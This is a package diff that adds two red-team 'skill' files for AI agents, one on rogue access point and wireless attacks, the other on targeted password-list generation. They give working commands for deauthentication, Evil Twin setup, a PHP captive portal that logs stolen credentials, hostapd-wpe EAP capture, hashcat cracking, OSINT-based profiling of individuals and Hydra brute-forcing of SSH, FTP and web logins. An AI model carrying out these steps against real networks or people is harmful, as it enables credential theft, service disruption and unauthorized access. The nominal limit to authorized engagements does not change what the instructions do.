rtexit-method 0.1.4 → 0.1.6

package/packaged-assets/.agents/skills/rt-wireless-rogue-ap/SKILL.md

@@ -0,0 +1,276 @@
+---
+name: rt-wireless-rogue-ap
+description: "Wireless attack skill beyond basic cracking. Rogue access point creation with hostapd-wpe for EAP credential capture, Evil Twin attacks, deauthentication attacks for client forcing, Karma attack for automatic client association, PMKID attack for WPA2 cracking without client, WPA3 Dragonblood downgrade, and ARP spoofing on wireless networks. Use when testing wireless network security in authorized engagements."
+---
+
+# rt-wireless-rogue-ap — Advanced Wireless Attacks
+
+## Overview
+
+Beyond WPA2 password cracking, wireless red teaming includes creating rogue access points to capture credentials, forcing clients off legitimate networks, and exploiting enterprise 802.1X authentication. This skill covers active wireless attacks requiring monitor-mode capable adapters.
+
+**Required hardware:** Wireless adapter with monitor mode + injection support (Alfa AWUS036ACH, AWUS036NHA, or similar).
+
+---
+
+## Phase 1 — Wireless Recon
+
+```bash
+# Set adapter to monitor mode
+airmon-ng check kill   # Kill conflicting processes
+airmon-ng start wlan0  # Creates wlan0mon
+
+# Scan all networks
+airodump-ng wlan0mon
+
+# Target specific network (capture handshakes)
+airodump-ng -c CHANNEL --bssid TARGET_BSSID -w capture wlan0mon
+
+# Identify clients connected to target AP
+airodump-ng wlan0mon | grep -A20 "TARGET_BSSID"
+# CLIENT_MAC = connected devices
+
+# Advanced: channel hopping + hidden SSID detection
+airodump-ng --band abg wlan0mon  # 2.4GHz + 5GHz
+```
+
+---
+
+## Phase 2 — WPA2 Attacks
+
+### 2a — PMKID Attack (No Client Needed)
+
+```bash
+# PMKID = feature of RSN IE in beacon frames
+# Can crack WPA2 without capturing a 4-way handshake
+
+# Install hcxtools
+apt install hcxtools hcxdumptool -y
+
+# Capture PMKID
+hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1
+
+# Convert to hashcat format
+hcxpcapngtool -o hash.hc22000 pmkid.pcapng
+
+# Crack with hashcat
+hashcat -a 0 -m 22000 hash.hc22000 /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
+hashcat -a 3 -m 22000 hash.hc22000 '?d?d?d?d?d?d?d?d'  # 8-digit PIN pattern
+```
+
+### 2b — Deauthentication + Handshake Capture
+
+```bash
+# Force clients to reconnect → capture 4-way handshake
+# Terminal 1: capture
+airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon
+
+# Terminal 2: deauth (kick clients off AP)
+aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c CLIENT_MAC wlan0mon
+# -0 5 = send 5 deauth frames
+# -c CLIENT_MAC = target specific client (or omit for broadcast)
+
+# Verify handshake captured
+aircrack-ng handshake-01.cap  # Should show "WPA handshake: AA:BB:CC..."
+
+# Crack
+aircrack-ng -w rockyou.txt handshake-01.cap
+hashcat -a 0 -m 22000 handshake-01.hc22000 rockyou.txt
+```
+
+---
+
+## Phase 3 — Rogue Access Point (Evil Twin)
+
+```bash
+# Create identical SSID/BSSID to target AP
+# Force clients to connect to our AP via deauth
+
+# Install hostapd + dnsmasq
+apt install hostapd dnsmasq -y
+
+# hostapd.conf — open AP with same SSID as target
+cat > /tmp/hostapd.conf << 'EOF'
+interface=wlan1       # Second wireless card for AP
+driver=nl80211
+ssid=TargetNetworkName
+hw_mode=g
+channel=6
+macaddr_acl=0
+ignore_broadcast_ssid=0
+EOF
+
+# dnsmasq.conf — DHCP + DNS for clients
+cat > /tmp/dnsmasq.conf << 'EOF'
+interface=wlan1
+dhcp-range=192.168.1.100,192.168.1.200,255.255.255.0,12h
+dhcp-option=3,192.168.1.1
+dhcp-option=6,192.168.1.1
+server=8.8.8.8
+log-queries
+log-dhcp
+EOF
+
+# Set up interface
+ip addr add 192.168.1.1/24 dev wlan1
+ip link set wlan1 up
+
+# Start AP + DHCP
+hostapd /tmp/hostapd.conf &
+dnsmasq -C /tmp/dnsmasq.conf --no-daemon &
+
+# Enable forwarding (optional — give clients internet access to avoid suspicion)
+echo 1 > /proc/sys/net/ipv4/ip_forward
+iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
+
+# Deauth clients from real AP (force them to our AP)
+aireplay-ng -0 0 -a REAL_AP_BSSID wlan0mon  # 0 = continuous deauth
+```
+
+---
+
+## Phase 4 — Captive Portal Credential Harvest
+
+```bash
+# After clients connect to Evil Twin → redirect all HTTP to captive portal
+
+# Install apache2 + PHP
+apt install apache2 php -y
+
+# Create portal page (mimics target network's login page)
+cat > /var/www/html/index.php << 'EOF'
+<?php
+if ($_POST) {
+    $user = $_POST['username'] ?? '';
+    $pass = $_POST['password'] ?? '';
+    $ip   = $_SERVER['REMOTE_ADDR'];
+    file_put_contents('/tmp/creds.txt', "$ip | $user | $pass\n", FILE_APPEND);
+    // Optional: proxy credentials to real network
+    header("Location: https://google.com");
+    exit;
+}
+?>
+<html><body>
+<h2>WiFi Login</h2>
+<form method="POST">
+Username: <input name="username"><br>
+Password: <input name="password" type="password"><br>
+<input type="submit" value="Connect">
+</form>
+</body></html>
+EOF
+
+# Redirect ALL web traffic to captive portal
+iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.1:80
+iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 192.168.1.1:80
+
+# Monitor captured credentials
+tail -f /tmp/creds.txt
+```
+
+---
+
+## Phase 5 — Enterprise 802.1X EAP Credential Capture
+
+```bash
+# Enterprise WPA uses EAP (PEAP/TTLS) — user enters domain credentials
+# Rogue AP can capture NTLMv2 hashes or cleartext credentials
+
+# hostapd-wpe (WiFi Pineapple Enterprise — captures EAP creds)
+apt install hostapd-wpe -y
+
+# hostapd-wpe.conf
+cat > /tmp/hostapd-wpe.conf << 'EOF'
+interface=wlan1
+driver=nl80211
+ssid=CorpWiFi          # Same SSID as enterprise network
+hw_mode=g
+channel=6
+wpa=3
+wpa_key_mgmt=WPA-EAP
+ieee8021x=1
+eap_server=1
+eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
+ca_cert=/etc/hostapd-wpe/certs/ca.pem
+server_cert=/etc/hostapd-wpe/certs/server.pem
+private_key=/etc/hostapd-wpe/certs/server.key
+dh_file=/etc/hostapd-wpe/certs/dh
+EOF
+
+hostapd-wpe /tmp/hostapd-wpe.conf
+
+# Output:
+# mschapv2: Wed Aug 14 12:34:56 2024
+#   username: CORP\john.smith
+#   challenge: 5d79f9...
+#   response: 4a3b2c...
+
+# Crack captured MSCHAPV2 hash
+# Format: username:::challenge:response:
+asleap -C 5d79f9... -R 4a3b2c... -W rockyou.txt
+# Or: hashcat -m 5500 (NTLMv1) / -m 5600 (NTLMv2)
+hashcat -a 0 -m 5600 mschapv2.hash rockyou.txt
+```
+
+---
+
+## Phase 6 — Karma Attack (Automatic Client Association)
+
+```bash
+# Clients probe for known networks — Karma responds to all probes
+# bettercap Karma module
+
+bettercap -iface wlan0mon
+
+# In bettercap console:
+wifi.recon on
+set wifi.ap.ssid ""              # Respond to any SSID
+set wifi.ap.channel 6
+set wifi.ap.encryption none      # Open AP
+wifi.ap on                       # Enable Karma behavior
+
+# Monitor connections
+events.stream on
+net.show
+```
+
+---
+
+## Phase 7 — WPA3 Dragonblood Downgrade
+
+```bash
+# Force WPA3-capable clients to use WPA2 (downgrade)
+# WPA3 requires SAE (Simultaneous Authentication of Equals)
+# If AP supports both WPA2 and WPA3 (transition mode) → downgrade
+
+# Create WPA2-only AP with same SSID
+# Clients configured for WPA3-SAE may fall back to WPA2-PSK
+# → capture handshake → crack as regular WPA2
+
+# Dragonblood timing attack (if WPA3-SAE only)
+git clone https://github.com/vanhoefm/dragonblood
+python3 dragonslayer.py -i wlan0mon --target BSSID
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** PMKID capture + hashcat cracking · airodump-ng recon
+
+**INTERMEDIATE:** Evil Twin + captive portal credential harvest · Deauth + handshake capture
+
+**ADVANCED:** hostapd-wpe for EAP/PEAP enterprise credential capture · Karma attack
+
+**EXPERT:** WPA3 Dragonblood · Custom EAP credential relay · Automated wireless red team framework
+
+---
+
+## References
+
+- aircrack-ng: https://www.aircrack-ng.org
+- hostapd-wpe: https://github.com/OpenSecurityResearch/hostapd-wpe
+- hcxtools: https://github.com/ZerBea/hcxtools
+- bettercap: https://www.bettercap.org
+- Dragonblood: https://dragonbloodattack.com
+- MITRE T1465: https://attack.mitre.org/techniques/T1465/

package/packaged-assets/.agents/skills/rt-wordlist-generation/SKILL.md

@@ -0,0 +1,288 @@
+---
+name: rt-wordlist-generation
+description: "Targeted wordlist and password list generation skill for authorized engagements. CeWL for website-based wordlist generation, CUPP for person-based password profiling, custom hashcat rules creation, keyboard walk patterns, company-specific mutation rules, OSINT-fed password generation, and SecLists curation for specific targets. Use before password spraying, brute-force, or hash cracking to maximize hit rate."
+---
+
+# rt-wordlist-generation — Targeted Wordlist & Password Generation
+
+## Overview
+
+Generic wordlists (rockyou.txt) have low success rates against modern enterprise passwords. Targeted wordlists built from OSINT about the organization, target person, or environment have dramatically higher success rates. This skill builds custom lists before spraying or cracking.
+
+---
+
+## Method 1 — CeWL (Company Website Wordlist)
+
+```bash
+# CeWL crawls target website and extracts unique words
+apt install cewl -y
+
+# Basic crawl
+cewl https://corp.com -d 3 -m 6 -w corp-base.txt
+# -d 3 = crawl 3 levels deep
+# -m 6 = minimum word length 6
+
+# Include numbers
+cewl https://corp.com -d 3 -m 5 --with-numbers -w corp-nums.txt
+
+# Crawl multiple pages
+for url in "https://corp.com" "https://corp.com/about" "https://corp.com/team"; do
+  cewl $url -d 2 -m 5 >> corp-all.txt
+done
+sort -u corp-all.txt > corp-unique.txt
+
+# What CeWL extracts:
+# Company name, product names, technology terms
+# Employee names from team pages
+# Location names, event names
+# Industry jargon
+
+# Typical output words: Synergy2024, ProjectApollo, TeamSpirit, CorporateIT
+```
+
+---
+
+## Method 2 — CUPP (Person-Targeted Password Generation)
+
+```bash
+# CUPP generates passwords based on personal info about a target
+pip3 install cupp
+# Or: git clone https://github.com/Mebus/cupp
+
+python3 cupp.py -i  # Interactive mode
+
+# Enter collected OSINT:
+# First name: John
+# Surname: Smith
+# Nickname: JSmith
+# Birthdate: 15031985
+# Partner's name: Sarah
+# Partner's birthdate: 22071987
+# Child name: Emma
+# Child birthdate: 05092010
+# Pet name: Buddy
+# Company: Accenture
+
+# Output: john.txt (thousands of variations)
+# Examples: John1985!, Smith@1985, JSmith15031985, Buddy2024!
+
+# CUPP also adds mutations: l33t speak, years, symbols
+```
+
+---
+
+## Method 3 — Custom Hashcat Rules
+
+```bash
+# Hashcat rules = transformations applied to each word in a list
+# Best64.rule ships with hashcat — extend it for corporate patterns
+
+# Common corporate password patterns (from breach data analysis):
+# CompanyName + Year + !     (Corp2024!)
+# Season + Year + !          (Summer2024!)
+# Month + Year               (January2024)
+# Name + 123!                (Smith123!)
+# Welcome + variation        (Welcome1!, W3lcome!)
+
+# Create corp_rules.rule
+cat > /opt/rules/corp_rules.rule << 'EOF'
+# Append current and prior years with symbols
+$2$0$2$4$!
+$2$0$2$3$!
+$2$0$2$4$@
+$2$0$2$3$@
+$2$0$2$4$#
+$1$2$3$!
+$1$2$3$@
+$!$1$2$3
+$@$1$2$3
+# Capitalize first letter
+c
+# Capitalize first, append year
+c$2$0$2$4
+c$2$0$2$4$!
+# l33t substitutions
+sa@ se3 si! so0 ss$ st+
+# Reverse
+r
+# Duplicate
+d
+# Append common suffixes
+$!$!
+$1$2$3$4
+$9$9$9
+EOF
+
+# Apply rules to wordlist
+hashcat --stdout corp-base.txt -r /opt/rules/corp_rules.rule | head -100
+hashcat --stdout corp-base.txt -r /opt/rules/corp_rules.rule \
+  -r /usr/share/hashcat/rules/best64.rule > corp-mutated.txt
+```
+
+---
+
+## Method 4 — OSINT-Fed Password Generation
+
+```bash
+# Gather OSINT → build hyper-targeted list
+
+# From LinkedIn company page:
+# - Founded year, HQ city, CEO name, product names, recent news
+
+# From employee OSINT:
+# - Names, birthdays, pet names, car models, spouse names
+# (Sources: social media, HaveIBeenPwned, breach databases)
+
+# Generate from company info
+python3 << 'EOF'
+company = "Accenture"
+city = "NewYork"
+ceo = "JulieSweetney"
+founded = "1989"
+products = ["myNav", "SynOps", "Velocity"]
+current_year = "2024"
+
+# Generate base words
+words = [company, city, ceo] + products
+words += [company + founded, company + current_year]
+
+# Apply common mutations
+mutations = []
+for w in words:
+    mutations += [
+        w,
+        w.lower(),
+        w.upper(),
+        w.capitalize(),
+        w + "!",
+        w + "1",
+        w + "123",
+        w + "123!",
+        w + current_year,
+        w + current_year + "!",
+        w + "@" + current_year,
+        w.replace("a","@").replace("e","3").replace("i","!").replace("o","0"),
+    ]
+
+with open("targeted.txt", "w") as f:
+    for m in sorted(set(mutations)):
+        f.write(m + "\n")
+print(f"Generated {len(set(mutations))} passwords")
+EOF
+```
+
+---
+
+## Method 5 — Keyboard Walk Patterns
+
+```bash
+# Many people use keyboard walks: qwerty, 1qaz2wsx, etc.
+pip3 install kwprocessor
+# github.com/hashcat/kwprocessor
+
+# Generate keyboard walk patterns
+kwp basechars/full.base keymaps/en-us.keymap routes/2-to-10-max-3-direction-changes.route -o keyboard_walks.txt
+
+# Common keyboard walks (pre-built in wordlists):
+# qwerty, qwerty123, qwerty!, 1234567890, !QAZ2wsx
+# 1qaz2wsx, 1q2w3e4r, zxcvbn, !@#$%^&*
+
+# Add to your combined list
+cat /opt/SecLists/Passwords/Keyboard-Combinations.txt >> combined.txt
+```
+
+---
+
+## Method 6 — Wordlist Combination & Optimization
+
+```bash
+# Combine all generated lists
+cat corp-unique.txt corp-mutated.txt targeted.txt keyboard_walks.txt \
+  /opt/SecLists/Passwords/Common-Credentials/top-passwords-shortlist.txt \
+  | sort -u > final_spray_list.txt
+
+wc -l final_spray_list.txt  # Check size
+
+# For password spraying (keep small — 10-50 passwords max to avoid lockout)
+# Sort by most likely: seasonal > company > common
+head -20 final_spray_list.txt > spray_top20.txt
+
+# For hash cracking (large list OK)
+# Order by probability (hashcat --keyspace for optimization)
+
+# Remove passwords that definitely don't meet policy
+# (if you know the policy: min 8 chars, must have uppercase+number)
+python3 << 'EOF'
+import re
+
+with open("final_spray_list.txt") as f:
+    words = f.read().splitlines()
+
+def meets_policy(p):
+    return (len(p) >= 8 and 
+            re.search(r'[A-Z]', p) and 
+            re.search(r'[0-9]', p))
+
+filtered = [w for w in words if meets_policy(w)]
+with open("policy_filtered.txt", "w") as f:
+    f.write("\n".join(filtered))
+print(f"After policy filter: {len(filtered)} passwords")
+EOF
+
+# Hashcat mask attack (pattern-based — covers what wordlists miss)
+# ?u = uppercase, ?l = lowercase, ?d = digit, ?s = special
+# Pattern: Capital + 6 lowercase + 4 digits + symbol (very common)
+hashcat -a 3 -m 1000 hashes.txt '?u?l?l?l?l?l?l?d?d?d?d?s' --increment
+```
+
+---
+
+## Method 7 — Default Credential Lists
+
+```bash
+# For network devices, printers, IoT devices, web consoles
+# These are separate from user password lists
+
+# Tools & lists
+# SecLists/Passwords/Default-Credentials/
+ls /opt/SecLists/Passwords/Default-Credentials/
+# default-passwords.csv
+# ssh-betterdefaultpasslist.txt
+# medical-devices.txt
+# telnet-betterdefaultpasslist.txt
+
+# Custom default cred testing with Hydra
+hydra -C /opt/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt \
+  TARGET_IP ftp
+
+hydra -C /opt/SecLists/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt \
+  TARGET_IP ssh
+
+# Web panels
+hydra -L /opt/SecLists/Usernames/top-usernames-shortlist.txt \
+  -P /opt/SecLists/Passwords/Default-Credentials/default-passwords.csv \
+  TARGET_IP http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** CeWL + append year/symbol mutations · Use SecLists default passwords · top-20 spray list
+
+**INTERMEDIATE:** CUPP for person-targeted lists · Custom hashcat rules · Policy-aware filtering
+
+**ADVANCED:** Full OSINT-fed generation pipeline · Keyboard walks · Combined cracking strategy (wordlist → rules → masks)
+
+**EXPERT:** ML-based password prediction from breach data · Context-aware rule generation · Real-time adaptive cracking
+
+---
+
+## References
+
+- CeWL: https://github.com/digininja/CeWL
+- CUPP: https://github.com/Mebus/cupp
+- kwprocessor: https://github.com/hashcat/kwprocessor
+- hashcat rules: https://hashcat.net/wiki/doku.php?id=rule_based_attack
+- SecLists: https://github.com/danielmiessler/SecLists
+- MITRE T1110: https://attack.mitre.org/techniques/T1110/